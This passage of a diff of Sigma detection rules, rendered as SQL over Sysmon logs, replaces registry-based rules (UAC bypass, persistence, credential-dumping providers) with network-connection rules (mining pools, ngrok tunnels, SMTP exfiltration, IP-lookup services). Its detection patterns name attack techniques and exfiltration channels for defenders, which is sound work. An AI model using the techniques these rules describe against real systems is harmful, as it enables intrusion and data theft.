'%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\' AND Details = 'DWORD (0x00000002)')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND DestinationHostname IN ('alimabi.cn', 'ap.luckpool.net', 'bcn.pool.minergate.com', 'bcn.vip.pool.minergate.com', 'bohemianpool.com', 'ca.minexmr.com', 'ca.monero.herominers.com', 'cbd.monerpool.org', 'cbdv2.monerpool.org', 'cryptmonero.com', 'crypto-pool.fr', 'crypto-pool.info', 'cryptonight-hub.miningpoolhub.com', 'd1pool.ddns.net', 'd5pool.us', 'daili01.monerpool.org', 'de.minexmr.com', 'dl.nbminer.com', 'donate.graef.in', 'donate.ssl.xmrig.com', 'donate.v2.xmrig.com', 'donate.xmrig.com', 'donate2.graef.in', 'drill.moneroworld.com', 'dwarfpool.com', 'emercoin.com', 'emercoin.net', 'emergate.net', 'ethereumpool.co', 'eu.luckpool.net', 'eu.minerpool.pw', 'fcn-xmr.pool.minergate.com', 'fee.xmrig.com', 'fr.minexmr.com', 'hellominer.com', 'herominers.com', 'huadong1-aeon.ppxxmr.com', 'iwanttoearn.money', 'jw-js1.ppxxmr.com', 'koto-pool.work', 'lhr.nbminer.com', 'lhr3.nbminer.com', 'linux.monerpool.org', 'lokiturtle.herominers.com', 'luckpool.net', 'masari.miner.rocks', 'mine.c3pool.com', 'mine.moneropool.com', 'mine.ppxxmr.com', 'mine.zpool.ca', 'mine1.ppxxmr.com', 'minemonero.gq', 'miner.ppxxmr.com', 'miner.rocks', 'minercircle.com', 'minergate.com', 'minerpool.pw', 'minerrocks.com', 'miners.pro', 'minerxmr.ru', 'minexmr.cn', 'minexmr.com', 'mining-help.ru', 'miningpoolhub.com', 'mixpools.org', 'moner.monerpool.org', 'moner1min.monerpool.org', 'monero-master.crypto-pool.fr', 'monero.crypto-pool.fr', 'monero.hashvault.pro', 'monero.herominers.com', 'monero.lindon-pool.win', 'monero.miners.pro', 'monero.riefly.id', 'monero.us.to', 'monerocean.stream', 'monerogb.com', 'monerohash.com', 'moneroocean.stream', 'moneropool.com', 'moneropool.nl', 'monerorx.com', 'monerpool.org', 'moriaxmr.com', 'mro.pool.minergate.com', 'multipool.us', 'myxmr.pw', 'na.luckpool.net', 'nanopool.org', 'nbminer.com', 'node3.luckpool.net', 'noobxmr.com', 'pangolinminer.comgandalph3000.com', 'pool.4i7i.com', 'pool.armornetwork.org', 'pool.cortins.tk', 'pool.gntl.co.uk', 'pool.hashvault.pro', 'pool.minergate.com', 'pool.minexmr.com', 'pool.monero.hashvault.pro', 'pool.ppxxmr.com', 'pool.somec.cc', 'pool.support', 'pool.supportxmr.com', 'pool.usa-138.com', 'pool.xmr.pt', 'pool.xmrfast.com', 'pool2.armornetwork.org', 'poolchange.ppxxmr.com', 'pooldd.com', 'poolmining.org', 'poolto.be', 'ppxvip1.ppxxmr.com', 'ppxxmr.com', 'prohash.net', 'r.twotouchauthentication.online', 'randomx.xmrig.com', 'ratchetmining.com', 'seed.emercoin.com', 'seed.emercoin.net', 'seed.emergate.net', 'seed1.joulecoin.org', 'seed2.joulecoin.org', 'seed3.joulecoin.org', 'seed4.joulecoin.org', 'seed5.joulecoin.org', 'seed6.joulecoin.org', 'seed7.joulecoin.org', 'seed8.joulecoin.org', 'sg.minexmr.com', 'sheepman.mine.bz', 'siamining.com', 'sumokoin.minerrocks.com', 'supportxmr.com', 'suprnova.cc', 'teracycle.net', 'trtl.cnpool.cc', 'trtl.pool.mine2gether.com', 'turtle.miner.rocks', 'us-west.minexmr.com', 'usxmrpool.com', 'viaxmr.com', 'webservicepag.webhop.net', 'xiazai.monerpool.org', 'xiazai1.monerpool.org', 'xmc.pool.minergate.com', 'xmo.pool.minergate.com', 'xmr-asia1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-us.suprnova.cc', 'xmr-usa.dwarfpool.com', 'xmr.2miners.com', 'xmr.5b6b7b.ru', 'xmr.alimabi.cn', 'xmr.bohemianpool.com', 'xmr.crypto-pool.fr', 'xmr.crypto-pool.info', 'xmr.f2pool.com', 'xmr.hashcity.org', 'xmr.hex7e4.ru', 'xmr.ip28.net', 'xmr.monerpool.org', 'xmr.mypool.online', 'xmr.nanopool.org', 'xmr.pool.gntl.co.uk', 'xmr.pool.minergate.com', 'xmr.poolto.be', 'xmr.ppxxmr.com', 'xmr.prohash.net', 'xmr.simka.pw', 'xmr.somec.cc', 'xmr.suprnova.cc', 'xmr.usa-138.com', 'xmr.vip.pool.minergate.com', 'xmr1min.monerpool.org', 'xmrf.520fjh.org', 'xmrf.fjhan.club', 'xmrfast.com', 'xmrigcc.graef.in', 'xmrminer.cc', 'xmrpool.de', 'xmrpool.eu', 'xmrpool.me', 'xmrpool.net', 'xmrpool.xyz', 'xx11m.monerpool.org', 'xx11mv2.monerpool.org', 'xxx.hex7e4.ru', 'zarabotaibitok.ru', 'zer0day.ru'))" ], - "filename": "registry_set_hidden_extention.yml" + "filename": "net_connection_win_crypto_mining_pools.yml" }, { - "title": "UAC Bypass via Sdclt", - "id": "5b872a46-3b90-45c1-8419-f675db8053aa", + "title": "Excel Network Connections", + "id": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", "status": "experimental", - "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", - "author": "Omer Yampel, Christian Burkard (Nextron Systems)", + "description": "Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.execution", + "attack.t1203" ], "falsepositives": [ - "Unknown" + "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", + "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", + "It is highly recommended to baseline your activity and tune out common business use cases." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationIsIpv6 = 'false') AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.0.0.1%' ESCAPE '\\')))" ], - "filename": "registry_set_uac_bypass_sdclt.yml" + "filename": "net_connection_win_excel_outbound_network_connection.yml" }, { - "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", - "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", + "title": "Suspicious Network Connection to IP Lookup Service APIs", + "id": "edf3485d-dac4-4d50-90e4-b0e5813f7e60", "status": "experimental", - "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", - "author": "frack113", + "description": "Detects external IP address lookups by non-browser processes via services such as \"api.ipify.org\". This could be indicative of potential post compromise internet test activity.", + "author": "Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.discovery", + "attack.t1016" ], "falsepositives": [ - "Unknown" + "Legitimate use of the external websites for troubleshooting or network monitoring" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationHostname LIKE '%api.2ip.ua%' ESCAPE '\\' OR DestinationHostname LIKE '%api.ipify.org%' ESCAPE '\\' OR DestinationHostname LIKE '%bot.whatismyipaddress.com%' ESCAPE '\\' OR DestinationHostname LIKE '%canireachthe.net%' ESCAPE '\\' OR DestinationHostname LIKE '%checkip.amazonaws.com%' ESCAPE '\\' OR DestinationHostname LIKE '%checkip.dyndns.org%' ESCAPE '\\' OR DestinationHostname LIKE '%curlmyip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%edns.ip-api.com%' ESCAPE '\\' OR DestinationHostname LIKE '%eth0.me%' ESCAPE '\\' OR DestinationHostname LIKE '%freegeoip.app%' ESCAPE '\\' OR DestinationHostname LIKE '%icanhazip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ident.me%' ESCAPE '\\' OR DestinationHostname LIKE '%ifconfig.io%' ESCAPE '\\' OR DestinationHostname LIKE '%ifconfig.me%' ESCAPE '\\' OR DestinationHostname LIKE '%ip-api.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ip.anysrc.net%' ESCAPE '\\' OR DestinationHostname LIKE '%ip.tyk.nu%' ESCAPE '\\' OR DestinationHostname LIKE '%ipaddressworld.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ipecho.net%' ESCAPE '\\' OR DestinationHostname LIKE '%ipinfo.io%' ESCAPE '\\' OR DestinationHostname LIKE '%ipof.in%' ESCAPE '\\' OR DestinationHostname LIKE '%ipv4.icanhazip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ipv4bot.whatismyipaddress.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ipwho.is%' ESCAPE '\\' OR DestinationHostname LIKE '%l2.io%' ESCAPE '\\' OR DestinationHostname LIKE '%myexternalip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%wgetip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%whatismyip.akamai.com%' ESCAPE '\\' OR DestinationHostname LIKE '%wtfismyip.com%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" + "filename": "net_connection_win_susp_external_ip_lookup.yml" }, { - "title": "Enabling COR Profiler Environment Variables", - "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", + "title": "Rundll32 Internet Connection", + "id": "cdc8da7d-c303-42f8-b08c-b4ab47230263", "status": "test", - "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "description": "Detects a rundll32 that communicates with public IP addresses", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1574.012" + "attack.t1218.011", + "attack.execution" ], - "level": "high", + "falsepositives": [ + "Communication to other corporate systems that use IP addresses from public address spaces" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\') OR CommandLine LIKE '%PcaSvc.dll,PcaPatchSdbTask%' ESCAPE '\\' OR SourceHostname LIKE '%.internal.cloudapp.net' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND DestinationPort = '443')))" ], - "filename": "registry_set_enabling_cor_profiler_env_variables.yml" + "filename": "net_connection_win_rundll32_net_connections.yml" }, { - "title": "Potential Persistence Via App Paths Default Property", - "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", + "title": "HH.EXE Network Connections", + "id": "468a8cea-2920-4909-a593-0cbe1d96674a", "status": "experimental", - "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "description": "Detects network connections made by the \"hh.exe\" process, which could indicate the execution/download of remotely hosted .chm files", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.012" + "attack.defense_evasion", + "attack.t1218.001" ], "falsepositives": [ - "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%iex%' ESCAPE '\\' OR Details LIKE '%Invoke-%' ESCAPE '\\' OR Details LIKE '%rundll32%' ESCAPE '\\' OR Details LIKE '%regsvr32%' ESCAPE '\\' OR Details LIKE '%mshta%' ESCAPE '\\' OR Details LIKE '%cscript%' ESCAPE '\\' OR Details LIKE '%wscript%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\hh.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" ], - "filename": "registry_set_persistence_app_paths.yml" + "filename": "net_connection_win_hh.yml" }, { - "title": "Blackbyte Ransomware Registry", - "id": "83314318-052a-4c90-a1ad-660ece38d276", - "status": "test", - "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", - "author": "frack113", + "title": "Script Initiated Connection to Non-Local Network", + "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "status": "experimental", + "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", + "author": "frack113, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Legitimate scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" ], - "filename": "registry_set_blackbyte_ransomware.yml" + "filename": "net_connection_win_script_wan.yml" }, { - "title": "Potential Persistence Via MyComputer Registry Keys", - "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", + "title": "Suspicious Outbound SMTP Connections", + "id": "9976fa64-2804-423c-8a5b-646ade840773", "status": "experimental", - "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" + "Other SMTP tools" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort IN ('25', '587', '465', '2525') AND Initiated = 'true') AND NOT (((Image LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND Image LIKE '%\\\\HxTsr.exe' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_mycomputer.yml" + "filename": "net_connection_win_susp_outbound_smtp_connections.yml" }, { - "title": "Service Binary in Suspicious Folder", - "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "title": "Communication To Ngrok Tunneling Service", + "id": "1d08ac94-400d-4469-a82f-daee9a908849", "status": "experimental", - "description": "Detect the creation of a service with a service binary located in a suspicious directory", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" ], "falsepositives": [ - "Unknown" + "Legitimate use of ngrok" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\'))" ], - "filename": "registry_set_creation_service_susp_folder.yml" + "filename": "net_connection_win_ngrok_tunnel.yml" }, { - "title": "Adwind RAT / JRAT - Registry", - "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", - "status": "experimental", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "RDP Over Reverse SSH Tunnel", + "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", + "status": "test", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", + "author": "Samir Bousseaden", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND Details LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" ], - "filename": "registry_set_mal_adwind.yml" + "filename": "net_connection_win_rdp_reverse_tunnel.yml" }, { - "title": "Potential Credential Dumping Attempt Using New NetworkProvider - REG", - "id": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", - "status": "experimental", - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Program Location with Network Connections", + "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "status": "test", + "description": "Detects programs with network connections running in suspicious files system locations", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Other legitimate network providers used and not filtred in this rule" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WebClient\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanWorkstation\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE 